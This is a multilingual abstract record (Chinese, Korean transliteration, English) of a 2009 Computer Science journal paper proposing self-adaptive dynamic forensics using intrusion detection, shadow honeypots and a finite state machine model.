计算机科学
計算機科學
계산궤과학
COMPUTER SCIENCE
2009年
11期
65-67,156
,共4页
动态取证%影子蜜罐%自适应%有限状态机
動態取證%影子蜜罐%自適應%有限狀態機
동태취증%영자밀관%자괄응%유한상태궤
Dynamic forensics%Shadow honeypot%Self-adaptive%Finite state machine
随着网络入侵技术和计算机犯罪技术的发展,动态取证变得越来越重要.利用入侵检测系统和蜜罐来实现入侵取证的方法在取证的实时性方面有很大优势,但这些方法没有过多考虑系统被入侵时证据可靠性以及系统可靠性的问题,而且取证的时机难以掌握.提出了一种自适应的动态取证方法,该方法采用入侵检测系统作为取证触发器,利用影子蜜罐对疑似攻击进行确认和进一步观察分析,自适应调整取证过程,获取关键证据,最后采用有限状态机对该机制进行建模,并对该机制中的状态转换时机、影子蜜罐、证据安全存储等关键技术进行描述.利用该机制来实现动态取证,可以使得取证过程更可控,可以减少不必要的证据量,并增强系统的容侵性.
隨著網絡入侵技術和計算機犯罪技術的髮展,動態取證變得越來越重要.利用入侵檢測繫統和蜜罐來實現入侵取證的方法在取證的實時性方麵有很大優勢,但這些方法沒有過多攷慮繫統被入侵時證據可靠性以及繫統可靠性的問題,而且取證的時機難以掌握.提齣瞭一種自適應的動態取證方法,該方法採用入侵檢測繫統作為取證觸髮器,利用影子蜜罐對疑似攻擊進行確認和進一步觀察分析,自適應調整取證過程,穫取關鍵證據,最後採用有限狀態機對該機製進行建模,併對該機製中的狀態轉換時機、影子蜜罐、證據安全存儲等關鍵技術進行描述.利用該機製來實現動態取證,可以使得取證過程更可控,可以減少不必要的證據量,併增彊繫統的容侵性.
수착망락입침기술화계산궤범죄기술적발전,동태취증변득월래월중요.이용입침검측계통화밀관래실현입침취증적방법재취증적실시성방면유흔대우세,단저사방법몰유과다고필계통피입침시증거가고성이급계통가고성적문제,이차취증적시궤난이장악.제출료일충자괄응적동태취증방법,해방법채용입침검측계통작위취증촉발기,이용영자밀관대의사공격진행학인화진일보관찰분석,자괄응조정취증과정,획취관건증거,최후채용유한상태궤대해궤제진행건모,병대해궤제중적상태전환시궤、영자밀관、증거안전존저등관건기술진행묘술.이용해궤제래실현동태취증,가이사득취증과정경가공,가이감소불필요적증거량,병증강계통적용침성.
With the development of intrusion and computer crime technologies, dynamic forensics is becoming more and more important.Dynamic forensics based on intrusion detection and honeypot technologies has great advantage in real-time performance,whereas these methods are defective in overcoming the difficulty of evidence and system reliability, and hard to seize the opportunity of investigation.A self-adaptive mechanwasm was proposed which used intrusion de-tection system as forensics trigger and shadow honeypot was used to verify the suspicious attack, observe and analyze the attack activities further more to gather key evidences.And then the finite state machine model of this mechanism was illuminated and key technologies such as shadow honeypot, state transition opportunity and evidence security stor-age method were described.The dynamic forensics system with this mechanism can tolerate intrusion in a certain degree and get the investigation process under control Moreover, the amount of unnecessary evidences can be reduced obviously.
